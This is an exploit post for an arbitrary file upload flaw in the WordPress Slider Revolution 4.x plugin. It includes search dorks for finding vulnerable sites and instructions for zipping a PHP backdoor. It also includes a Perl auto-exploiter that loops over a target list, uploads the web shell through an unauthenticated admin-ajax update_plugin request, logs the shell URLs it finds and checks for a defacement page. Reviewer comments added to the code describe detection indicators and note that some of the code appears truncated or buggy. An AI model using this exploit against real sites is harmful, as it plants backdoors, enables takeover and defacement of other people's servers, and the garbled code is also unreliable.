================================================================================================= | # Title : WordPress - Slider Revolution 4.x.x WordPress - arbitrary file upload exploit | | # Author : indoushka | | # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 66.0(64-bit) | | # Vendor : https://www.sliderrevolution.com/ | | # Dork : index off revslider\backup | plugins/revslider/public/assets/css/settings.css | revslider.php "index of" | wp-content/plugins/revslider/ 2013 | ================================================================================================= [+] poc : [+] Web shell upload : The following perl exploit will attempt to upload backdoor through the update_plugin function To use the exploit, be sure to compress the backdoor file with name [revslider.zip] Save the backdoor with a name cmd.php, and then run WinRAR to compress the file with the zip extension Because the exploit uploads a compressed file to the target [+] simple backdoor : [+] create a text file with name list.txt to save in it your targets [+] The exploit and the backdoor must be in the same folder and path [+] The following Perl exploit save it to a text file with extensionthe ( poc.pl ) Perl must be installed on your machine [+] Perl exploit :
#!/usr/bin/perl
# Reviewer notes (documentation only; the code below is reproduced as published).
#
# What the script does, per the visible code: for every line taken as a target
# base URL, it GETs wp-admin/admin-ajax.php, then POSTs a multipart form with
# action=revslider_ajax_action, client_action=update_plugin and a file field
# update_file=revslider.zip, and finally probes for
# wp-content/plugins/revslider/temp/update_extract/revslider/cmd.php and
# /leet.html on the target.
#
# Detection value for defenders: the observable indicators this script emits are
# an unauthenticated POST to admin-ajax.php carrying those two parameters with a
# zip attachment, the fixed User-Agent string set below, and follow-up GETs for
# the two paths above; on disk, new files under plugins/revslider/temp/update_extract/
# are the artifact to look for. Mitigation: a current plugin build is expected to
# reject this unauthenticated update_plugin call — confirm against the vendor advisory.
#
# NOTE(review): the page text appears to have lost angle-bracket content during
# rendering (the empty while condition and the one-character regex below look
# truncated); the code is documented exactly as shown, not as it may have read.
# NOTE(review): no `use strict`/`use warnings`; $target is an undeclared package global.
use LWP::UserAgent;
# Clear the terminal; $^O distinguishes Windows from everything else.
system(($^O eq 'MSWin32') ? 'cls' : 'clear');
head();
my $usage = " \nperl $0 \n perl $0 list.txt";
die "$usage" unless $ARGV[0];
# NOTE(review): 2-arg open on a bareword handle with $ARGV[0] interpolated into
# the mode string — the argument can alter the open mode. Shown as published.
open(tarrget,"<$ARGV[0]") or die "$!";
# NOTE(review): empty condition as rendered; see the truncation note above.
while(){
    chomp($_);
    $target = $_;
    my $path = "wp-admin/admin-ajax.php";
    print "\nTarget => $target\n";
    # TLS certificate verification is disabled for every request.
    my $ua = LWP::UserAgent->new(ssl_opts => { verify_hostname => 0 });
    $ua->timeout(10);
    # Fixed User-Agent — a usable signature in web server logs.
    $ua->agent("Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.31 (KHTML, like Gecko) Chrome/26.0.1410.63 Safari/537.31");
    # Reachability probe only: is_success is any 2xx for the admin-ajax endpoint.
    my $req = $ua->get("$target/$path");
    if($req->is_success) {
        print "\n [+] Xploit Possibility Work :3\n \n";
        print " [*] Try Exploiting Vulnerability\n";
        print " [*] Xploiting $target\n";
        # The request a WAF/IDS rule would key on: revslider_ajax_action +
        # update_plugin with a multipart file part, sent without any cookie.
        my $exploit = $ua->post("$target/$path", Cookie => "", Content_Type => "form-data", Content => [action => "revslider_ajax_action", client_action => "update_plugin", update_file => ["revslider.zip"]]);
        print " [*] Sent payload\n";
        # The author treats this error string in the response as the success signal.
        if ($exploit->decoded_content =~ /Wrong update extracted folder/) {
            print " [+] Payload successfully executed\n";
            print " [*] Checking if shell was uploaded\n";
            my $check = $ua->get("$target/wp-content/plugins/revslider/temp/update_extract/revslider/cmd.php")->content;
            # NOTE(review): as rendered the pattern between the slashes is a bare
            # newline; the original content was probably lost (see note at top).
            if($check =~/
/) {
                print " [+] Shell successfully uploaded\n";
                # Unchecked open/print/close on an append handle; results go to Shell.txt
                # in the current directory.
                open(save, '>>Shell.txt');
                print save "shell : $target/wp-content/plugins/revslider/temp/update_extract/revslider/cmd.php?zeb\n";
                close(save);
                print " [*] Checking if Deface was uploaded now\n";
                my $def = $ua->get("$target/leet.html")->content;
                # NOTE(review): `= ~` here is an assignment of the complemented
                # result of matching $_, not a `=~` test of $def — the branch taken
                # does not reflect the fetched page. Shown as published.
                if($def = ~/Hacked/) {
                    print " [+] Deface uploaded successfull\n";
                }
                else {print " [-] Deface not Uploaded :/"; }
            }
            else {
                print " [-] I'think Shell Not Uploaded :/\n";
            }
        }
        else {
            print " [-] Payload failed: Fail\n";
            print "\n";
        }
    }
    else {
        print "\n [-]Xploit Fail \n"
    }
    # Banner printer; a named sub is compiled regardless of being placed inside
    # the loop body.
    sub head {
        print "\t +===============================================\n";
        print "\t | Auto Exploiter Revslider Shell Upload \n";
        print "\t | Edited: indoushka\n";
        print "\t +===============================================\n";
    }
}